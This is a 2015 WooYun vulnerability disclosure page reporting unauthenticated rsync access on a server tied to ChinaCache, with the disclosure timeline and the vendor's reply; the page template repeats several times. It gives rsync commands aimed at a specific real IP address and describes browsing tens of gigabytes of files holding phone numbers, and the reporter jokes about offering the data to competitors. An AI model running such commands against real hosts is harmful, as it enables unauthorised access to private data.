蓝汛某服务器Rsync未授权访问(可能泄露商业数据)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115045

漏洞标题：蓝汛某服务器Rsync未授权访问(可能泄露商业数据)

漏洞作者： Wulala

提交时间：2015-05-20 08:18

修复时间：2015-07-04 10:28

公开时间：2015-07-04 10:28

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-20：细节已通知厂商并且等待厂商处理中
2015-05-20：厂商已经确认，细节仅向厂商公开
2015-05-30：细节向核心白帽子及相关领域专家公开
2015-06-09：细节向普通白帽子公开
2015-06-19：细节向实习白帽子公开
2015-07-04：细节向公众公开

简要描述：

蓝汛某服务器为授权访问，泄露敏感信息。
好想在Wooyun Zone混混，可是一直是路人，~~~~(>_<)~~~~
小编鼠标点一下，从此不再是路人！！！只求高于2Rank

详细说明：

蓝汛某服务器为授权访问，泄露敏感信息。
rsync -vvvv rsync://58.68.237.116/
rsync -vvvv rsync://58.68.237.116/bak
rsync -vvvv rsync://58.68.237.116/daydate
好几十G的文件,大约看了一下里面大部分是一些Excel数据。对数据和网站分析了一下，这个应该是蓝汛服务通讯记录，里面的手机号不是蓝汛的客户就是潜在的客户，应该算的上商业数据吧。

全国各地，一级数据到四级数据....

漏洞证明：

如上

修复方案：

数据纯属个人推断,如有问题欢迎忽略，这样我就能问问你们的竞争对手要不要啦^_^
1. 对访问的IP做限制
<div dispay="none" style="font-size:28px;">
开个玩笑，所有数据已删除！！！
</div>

版权声明：转载请注明来源 Wulala@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-05-20 10:26

厂商回复：

客户的系统，蓝汛无权修改，我们已知会客户尽快修复该漏洞，谢谢Wulala

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115045

漏洞标题：蓝汛某服务器Rsync未授权访问(可能泄露商业数据)

相关厂商：ChinaCache

漏洞作者： Wulala

提交时间：2015-05-20 08:18

修复时间：2015-07-04 10:28

公开时间：2015-07-04 10:28

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Wulala@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115045

漏洞标题：蓝汛某服务器Rsync未授权访问(可能泄露商业数据)

相关厂商：ChinaCache

漏洞作者： Wulala

提交时间：2015-05-20 08:18

修复时间：2015-07-04 10:28

公开时间：2015-07-04 10:28

漏洞类型：未授权访问/权限绕过

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0115045"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Wulala@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：